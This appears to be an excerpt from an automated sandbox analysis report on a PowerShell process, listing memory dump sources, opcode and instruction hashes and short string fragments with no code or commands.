                                      • API String ID: 0-1537318081
                                      • Opcode ID: 73b5601f387b08f9eb31282abaa4770a4912ea146d66df752ce50c7b574f9af9
                                      • Instruction ID: 3eebea9b0df63a16bb16f417315bb8b4f92aaec43ab459edf728c7713e6ca2a1
                                      • Opcode Fuzzy Hash: 73b5601f387b08f9eb31282abaa4770a4912ea146d66df752ce50c7b574f9af9
                                      • Instruction Fuzzy Hash: 3A5281707102058FDB64DB54C950F6ABBB2FB85314F54C4A8E9099F352CA72ED868FA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$x.{k$-{k
                                      • API String ID: 0-1537318081
                                      • Opcode ID: cca22e2f1b437aa1a202586ee310a2f000fa98e06ab59250fd5cd3fbed4ff892
                                      • Instruction ID: 1b8b5322a41245366e9eb8e744c47598d2cdb4f7a895ca73b015b88dad3cbcc0
                                      • Opcode Fuzzy Hash: cca22e2f1b437aa1a202586ee310a2f000fa98e06ab59250fd5cd3fbed4ff892
                                      • Instruction Fuzzy Hash: 884272707102149FD760DB58CA50BEABBB2EF89304F5084D9E9095F352CB72ED868FA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Haq$$]q$$]q
                                      • API String ID: 0-1533201563
                                      • Opcode ID: 3fdbbaae4f00fc5b7b3e078807b3d657f9b94164fc52830c3fb4c62a439de9d5
                                      • Instruction ID: 25946176269089d5f3a23e35b78bd97a4576e91865e52b83359df82fe092c847
                                      • Opcode Fuzzy Hash: 3fdbbaae4f00fc5b7b3e078807b3d657f9b94164fc52830c3fb4c62a439de9d5
                                      • Instruction Fuzzy Hash: 72226D30B002189FCB65DB24C8946BEB7B2BF89704F1184E9D90AAB360DF759D85CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$x.{k$-{k
                                      • API String ID: 0-1537318081
                                      • Opcode ID: 20402e1800fc063aae288bfb1744106bc8e7ecfdcd1264d0c964965900ba3ed9
                                      • Instruction ID: 1601ff2048891b9d9d81f77009af5ecd70660e12d30b9630ee4d88b91d0568a1
                                      • Opcode Fuzzy Hash: 20402e1800fc063aae288bfb1744106bc8e7ecfdcd1264d0c964965900ba3ed9
                                      • Instruction Fuzzy Hash: 772291706102118FDB64DB54CA50F6ABBB2FF85314F54C498E909AF352CB72ED868FA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$x.{k$-{k
                                      • API String ID: 0-1537318081
                                      • Opcode ID: a571488676d5e9f8a82f1da417363782eb4430c63114a41880d7f0e8e4a75a0b
                                      • Instruction ID: 218f306323f43de001678bfaea6744b1603500381a9eed6c643927e28cbbe121
                                      • Opcode Fuzzy Hash: a571488676d5e9f8a82f1da417363782eb4430c63114a41880d7f0e8e4a75a0b
                                      • Instruction Fuzzy Hash: 831273707102149FD764DB58CA51FEABBB2FB89304F508498E9095F391CB72ED868FA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$x.{k
                                      • API String ID: 0-1521076892
                                      • Opcode ID: b17d6daa7e3d89a5382789bd97440220a2740aebebb3b8d6fce2bbb341977b01
                                      • Instruction ID: b43dcc256a74aca0441f034858a89dce906c5b74249f90f6c1f3273c68346d4b
                                      • Opcode Fuzzy Hash: b17d6daa7e3d89a5382789bd97440220a2740aebebb3b8d6fce2bbb341977b01
                                      • Instruction Fuzzy Hash: 47125EB4B10215CFDB60CB58CA40BAAB7B2FB85314F1485E8D9096B351CB72ED86DF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$x.{k
                                      • API String ID: 0-1521076892
                                      • Opcode ID: 6bd6fbf17255e469cd480c4ed8d56bde263715404bdc97f210db63405f30ec5c
                                      • Instruction ID: c58e3be4394910b3bd8690df18baea28ebf3fcd3f7bdc65f6ff10bdf6eb1d90b
                                      • Opcode Fuzzy Hash: 6bd6fbf17255e469cd480c4ed8d56bde263715404bdc97f210db63405f30ec5c
                                      • Instruction Fuzzy Hash: F9E17EB4B10215DFDB60CB58CA80BAAB7B2FB85304F1485E8D9096B351CB72ED85DF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tP]q$tP]q
                                      • API String ID: 0-145478062
                                      • Opcode ID: 7676a3645731c643b164cb6d445a8f813cf6ff82242ef8fc38b6ca680eaebb14
                                      • Instruction ID: 785578026c196c58ab245aa1650d64e57717d4d0aa5044154fdbeef76a924b95
                                      • Opcode Fuzzy Hash: 7676a3645731c643b164cb6d445a8f813cf6ff82242ef8fc38b6ca680eaebb14
                                      • Instruction Fuzzy Hash: A851477172535B9FCF354A69C800B6ABBA6EF86311F1C847AD5848B291C771D844C3B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: x.{k
                                      • API String ID: 0-2880906344
                                      • Opcode ID: 744bafcfd218920082539bba77a1a156b746a8c64f320d507429601b8be95b0c
                                      • Instruction ID: 2ea4efa684c0fff7306638e4b8f3afb4ad87ae10c14a58ac23f8bacfdb0b3374
                                      • Opcode Fuzzy Hash: 744bafcfd218920082539bba77a1a156b746a8c64f320d507429601b8be95b0c
                                      • Instruction Fuzzy Hash: 9E31E7707401009FD714ABA5CA55FAFBAA3EFC4710F108824E9026F391CE769C46CBE1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9919b35b2ee0df862d358b102dab86c25b3e8ad903be02503edc475abaa6c783
                                      • Instruction ID: 6f40e7bfe6681dbc16d5e0eecfb69b5c5860216f50e8372bf5a32551632279ae
                                      • Opcode Fuzzy Hash: 9919b35b2ee0df862d358b102dab86c25b3e8ad903be02503edc475abaa6c783
                                      • Instruction Fuzzy Hash: B8C1B131E00208CFCB58DFA4D844AADBBB6FF84314F1685A9E8059B365CB75EC49CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e62437f5b49c1eaa110f4079aa40a6b7b2514e50902e67ad08d8c02bd84f960
                                      • Instruction ID: fe3c168973046c34b2dcff06e7359ed163e1cbf11e49111becd1b34433036d8e
                                      • Opcode Fuzzy Hash: 3e62437f5b49c1eaa110f4079aa40a6b7b2514e50902e67ad08d8c02bd84f960
                                      • Instruction Fuzzy Hash: C3B17071E00219DFDF90CFA8C9857EDBBF2AF88304F158169D815A7294EBB49945CF81
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a0f5ab1b8148b9fb3f3ecfacc323422da728aad93a323f4d8510f3d678a6c76
                                      • Instruction ID: 5db1c8c9a40c23edf04642d4b0e7a33b845ef522794efc9aec758104da6881b0
                                      • Opcode Fuzzy Hash: 4a0f5ab1b8148b9fb3f3ecfacc323422da728aad93a323f4d8510f3d678a6c76
                                      • Instruction Fuzzy Hash: 07A15D70E00209CFDB90CFA8D9857EDBBF2EF48314F258569D815A7254EBB89885CF81
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c999ff1d46bb5282a6947edd359acb79a50deeea28a5568bdaed5596e99901a
                                      • Instruction ID: adeee9480668c00750fda8fce938a129ecbbbed3bd031e5118d74bbe73ecea50
                                      • Opcode Fuzzy Hash: 5c999ff1d46bb5282a6947edd359acb79a50deeea28a5568bdaed5596e99901a
                                      • Instruction Fuzzy Hash: 60916B70A002099FCB45CF58C5949AEFBB1FF89310B258699D825AB366D731FD51CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2626ee81c810ecdb653f2d363f1038fec393c87deef36e0590b1d835e037dfef
                                      • Instruction ID: 4415348c09d2e4fbf05ae40cb736194a677d5ae8a7e969e4971c1b7c28442ba0
                                      • Opcode Fuzzy Hash: 2626ee81c810ecdb653f2d363f1038fec393c87deef36e0590b1d835e037dfef
                                      • Instruction Fuzzy Hash: FD71C130A01209CFCB18DF68C884AADBBF6FF85314F1585AAD815DB795DB71AC46CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f1b142ba0cdd5a29f81520a0d638141777933252aadeb21d78c14722adcaa53
                                      • Instruction ID: 7c14b21f8796d885f820630d5c74e28056fd63b527c41a292bb6124d2a20457e
                                      • Opcode Fuzzy Hash: 2f1b142ba0cdd5a29f81520a0d638141777933252aadeb21d78c14722adcaa53
                                      • Instruction Fuzzy Hash: AC718230E002089FDB58DFA5D484BADB7F6FF88304F158469D806AB790DB75AD4ACB51
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8492efda92b296fe75171c3e18a7cdf84b3a8123c57519fea05ab7dbe84402cf
                                      • Instruction ID: dcf21ec42c29cb4ba303ab625f29466bd6968bdf63ec6aad7e47711ec82de297
                                      • Opcode Fuzzy Hash: 8492efda92b296fe75171c3e18a7cdf84b3a8123c57519fea05ab7dbe84402cf
                                      • Instruction Fuzzy Hash: 6E7190B0E002499FDF54DFA9C9817AEBBF2BF88314F158069D815A7254DB789842CF91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b521f2ee856a11229163f87fbd21f9246c2cb760b6fc90d96bfae84bfd1e7f2e
                                      • Instruction ID: 5e976ed234f074e763f965737daca2665a356c0f67251f08cb319f9ee0af337d
                                      • Opcode Fuzzy Hash: b521f2ee856a11229163f87fbd21f9246c2cb760b6fc90d96bfae84bfd1e7f2e
                                      • Instruction Fuzzy Hash: 74718CB1E00249DFDF50DFA8C9817EDBBF2AF88314F158169D819A7254DBB89842CF91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42c13e8d954e3641c1080a1b7e55aa51f08e02cc2297c86316e4b28629fb2bad
                                      • Instruction ID: 9658b30a1b14048226245a0663c21634023b910ba46cfa282b9bf81715bc6a9a
                                      • Opcode Fuzzy Hash: 42c13e8d954e3641c1080a1b7e55aa51f08e02cc2297c86316e4b28629fb2bad
                                      • Instruction Fuzzy Hash: 1D51A0B0F20106DFDB21CBA4C641BADBBB2EF85300F248569E4159B3A2CB72D845CF91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d9ed4fd61a60126d252af07a85d66a3d2bccd7de85af2435f505e0a080ddb003
                                      • Instruction ID: 0a606bf398f8ad905d52e19b3cf9c684d8015098bbb24d3cbb3d8797461a6e14
                                      • Opcode Fuzzy Hash: d9ed4fd61a60126d252af07a85d66a3d2bccd7de85af2435f505e0a080ddb003
                                      • Instruction Fuzzy Hash: BE417F31B01214CFDB19EB74C554AAE7BB2FF89754F0940A9E802EB3A1DB749C45CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: efa4b33a95b70688570aa2c839789ed24f0266436f5f169d4f1cf212c9ce2f24
                                      • Instruction ID: e11b5414daf62ca5ea10ed97847fcc6820bd7e47facd061a332504d90e77bb8b
                                      • Opcode Fuzzy Hash: efa4b33a95b70688570aa2c839789ed24f0266436f5f169d4f1cf212c9ce2f24
                                      • Instruction Fuzzy Hash: 6E3145B172020B8BCF289A79C9507AEB7E5EF84714F18883AC945DB340DB32D905C790
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8ff5bc56ab536a4fb1ab164fd316626242d0f4fcba6b895ec2a9ee91c725aef
                                      • Instruction ID: 969df3b54af482330959023eab5cf9b751944d36acf2d9fbff31e8d46bc91196
                                      • Opcode Fuzzy Hash: d8ff5bc56ab536a4fb1ab164fd316626242d0f4fcba6b895ec2a9ee91c725aef
                                      • Instruction Fuzzy Hash: AD41A270A012188FDB18DFA5C8446EDBBF6FF88304F118569D406AB794DBB4AC49CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6fae9fd5474371a46ddce593cd82f1649280cfc983b34eabfe3b8f18a0132c6
                                      • Instruction ID: a1c2a9f43fd9cd76856d2adc22c682932067e5c29f406210af5ff6d6ac37757b
                                      • Opcode Fuzzy Hash: a6fae9fd5474371a46ddce593cd82f1649280cfc983b34eabfe3b8f18a0132c6
                                      • Instruction Fuzzy Hash: 2A41F6B0E20203DFCF248E68C6517BA77A2AFC6350F5C84BAD805DB251D736D846C7A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fa028d6f19e045a01897f5c7c6949632ab5208fa8f91d127818f39d7bd32fb7
                                      • Instruction ID: 50278fbe0e29f279ee796791aa8352dd052f710326d28379ebaea7868793e5aa
                                      • Opcode Fuzzy Hash: 6fa028d6f19e045a01897f5c7c6949632ab5208fa8f91d127818f39d7bd32fb7
                                      • Instruction Fuzzy Hash: 3F412874A006099FCB05CF58C5949BAFBB1FF49310B268299D815AB366C732FD91CBA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5f9c444787287b2e74873e7fe57b1c5446fd94de99ccf889ba21676cd2a7e8d
                                      • Instruction ID: 3b6e4dd35fff13046eeed9e45104dc861679dc32c068a4f7048ef4a85b10e94e
                                      • Opcode Fuzzy Hash: f5f9c444787287b2e74873e7fe57b1c5446fd94de99ccf889ba21676cd2a7e8d
                                      • Instruction Fuzzy Hash: 66215AB132034FABCF6415BB8951736B6D6DBC5711F388839E949CB380CE76C8518360
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac83c9bb269ff0da9e5e48387f9e73c0808afbc201ba04183bd480b1c1086fbf
                                      • Instruction ID: 2b016f6d5ad48b64395aab2e11b2a7ddb7c13a24d6b88c112a52a926c21cdd12
                                      • Opcode Fuzzy Hash: ac83c9bb269ff0da9e5e48387f9e73c0808afbc201ba04183bd480b1c1086fbf
                                      • Instruction Fuzzy Hash: E3318130B01218DFCB66DB24C8956EEB7B2BF49304F1040E9D909AB351CB759E86CF91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a2151c80e7b4d20b7dae1f3394c4827bbabb29ed3437ddb6a768516c9d01b62d
                                      • Instruction ID: 90b2d27d2a4bf0f66dd0ba21d3fcc69d66b40898cda3ea2b892b21cf05918319
                                      • Opcode Fuzzy Hash: a2151c80e7b4d20b7dae1f3394c4827bbabb29ed3437ddb6a768516c9d01b62d
                                      • Instruction Fuzzy Hash: 66319C70A082858FCB41CF68C9908AABFB0EF4A300B158496D945DB352C634ED45CBA1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: feff7b29bbd6978e3c3166cae183e3894dfd1df497dc20756ff73cff445aa5ef
                                      • Instruction ID: 0d30028d94a849c9196ad181f59793e540b06f6199650071fd0cad409f46b060
                                      • Opcode Fuzzy Hash: feff7b29bbd6978e3c3166cae183e3894dfd1df497dc20756ff73cff445aa5ef
                                      • Instruction Fuzzy Hash: A621667032838BAFCB64167B49517367FA5DF82710F2C8476E844CB2D2CA6A8C54C371
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d965c4dc415e97c90bf321b7e0c91e4e13c9d3d8e0e60b30c7f29655145e1f4
                                      • Instruction ID: 5f8ef1aa58cecad43767a07b244840f1463811bba0ce15453d8573d5ee73859d
                                      • Opcode Fuzzy Hash: 0d965c4dc415e97c90bf321b7e0c91e4e13c9d3d8e0e60b30c7f29655145e1f4
                                      • Instruction Fuzzy Hash: A3219174A093898FC742CF58C8909AABFB1FF8A310B1582D7D945DB362D235EC45CBA1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e5b22503d5d24d86881755a02d24ab8d16b33bc8f472e1be1059bcf01852a51
                                      • Instruction ID: afd654ec2cd66c2fe8ce99f398750c94009c00373d34b15675a5078439290700
                                      • Opcode Fuzzy Hash: 5e5b22503d5d24d86881755a02d24ab8d16b33bc8f472e1be1059bcf01852a51
                                      • Instruction Fuzzy Hash: C9215E74A04249CFCB41CF98D4809EABBB1FF89310B1585A6D909EB352D231ED46CBA1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87e82655848f3692d22ab3f62167e96fd96e84aca0d95d12c70f49e8616ffa78
                                      • Instruction ID: 8cc3749b930f8f2d7e67d443b3a7db3cdccc19b890e382179db3a508aa4c0ddc
                                      • Opcode Fuzzy Hash: 87e82655848f3692d22ab3f62167e96fd96e84aca0d95d12c70f49e8616ffa78
                                      • Instruction Fuzzy Hash: CD11E631C10158CBDFE4DA94E9887FCB7B1AB45319F1614AAC811B61D0EFB45ACACF16
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2906957167.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_45ad000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96aa37fe62376c71936fbd0a0ffd3064b85b0e81f84a5caac65ad6fadb7bba68
                                      • Instruction ID: fa3220e65df3c9582712df3e380f0a2433a1b6b095d7e2ee7872f6e5f8a869a9
                                      • Opcode Fuzzy Hash: 96aa37fe62376c71936fbd0a0ffd3064b85b0e81f84a5caac65ad6fadb7bba68
                                      • Instruction Fuzzy Hash: 17012071104344DDD7209E15ED84B6BBFECFF45320F18C415DD480B646E279A845D6B1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2906957167.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_45ad000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b51b40ec047452ded91c13d1b8b60e60ccb2c23d7ea36cffca00100cc3a6aa4b
                                      • Instruction ID: bd6d32e834dcce2d90ea089893724dbd996459bd1ca6a1323567f4dfce8b9aba
                                      • Opcode Fuzzy Hash: b51b40ec047452ded91c13d1b8b60e60ccb2c23d7ea36cffca00100cc3a6aa4b
                                      • Instruction Fuzzy Hash: A7019E7100E3C09ED7129B259998B56BFB4EF43224F1DC0DBD9888F6A7C2695849C772
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2906957167.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_45ad000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 187ef0e12cedd833ccac46f6cf9e0966ed8105a3c7d067c63f74cff3efb97803
                                      • Instruction ID: 7c1b6afc1ab57584b0b2e0191e1cdad92ff0fead87999751e1b4ac4e1df885bd
                                      • Opcode Fuzzy Hash: 187ef0e12cedd833ccac46f6cf9e0966ed8105a3c7d067c63f74cff3efb97803
                                      • Instruction Fuzzy Hash: 1121F471604204DFDB05EF14D9C0F2ABF76FB88324F24C569D9090AA16C37AF46AE7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$TQbq$TQbq$TQbq$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$(cq$(cq$(cq
                                      • API String ID: 0-332442264
                                      • Opcode ID: 20ce052d1e44c63f18e2bf35806ffa66dd912bccc29f532543639202f6b39274
                                      • Instruction ID: ddc08070370a1e311891ebab381c0f70bc18a37c71a9850f5ec5143a24f7d272
                                      • Opcode Fuzzy Hash: 20ce052d1e44c63f18e2bf35806ffa66dd912bccc29f532543639202f6b39274
                                      • Instruction Fuzzy Hash: DEF1C5B2A20207DFCF24CE58C644AAAB7E6FF85311F5D8479E8459B294C771DC81CBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-720800717
                                      • Opcode ID: 1d31ef6952d6d93d0a7ff7ef43753167129a433df64b870ed9f612fffcf5fe27
                                      • Instruction ID: 964d3acda030996206ddd126cdc60b334394f1fd0f86260c177884aff1546fe9
                                      • Opcode Fuzzy Hash: 1d31ef6952d6d93d0a7ff7ef43753167129a433df64b870ed9f612fffcf5fe27
                                      • Instruction Fuzzy Hash: D8C138B2F20207DFDF24CF69C5506BABBE6BF84710F19847AD8058B290DA71D941C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$d5zk$tP]q$tP]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-3555868966
                                      • Opcode ID: 8c79c1cd2de8cbe24a4d433d5213857b3255149489044e51f692476d91a03cd8
                                      • Instruction ID: 09dcbe7374285b4f355e0462d8fbffd8db8d7f480d4c6bb14c0dcc2638ac998e
                                      • Opcode Fuzzy Hash: 8c79c1cd2de8cbe24a4d433d5213857b3255149489044e51f692476d91a03cd8
                                      • Instruction Fuzzy Hash: D0E13AB1B343479FCF254B78891076ABBA6EFD2310F1C88BAD9458B351DA71C846C3A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
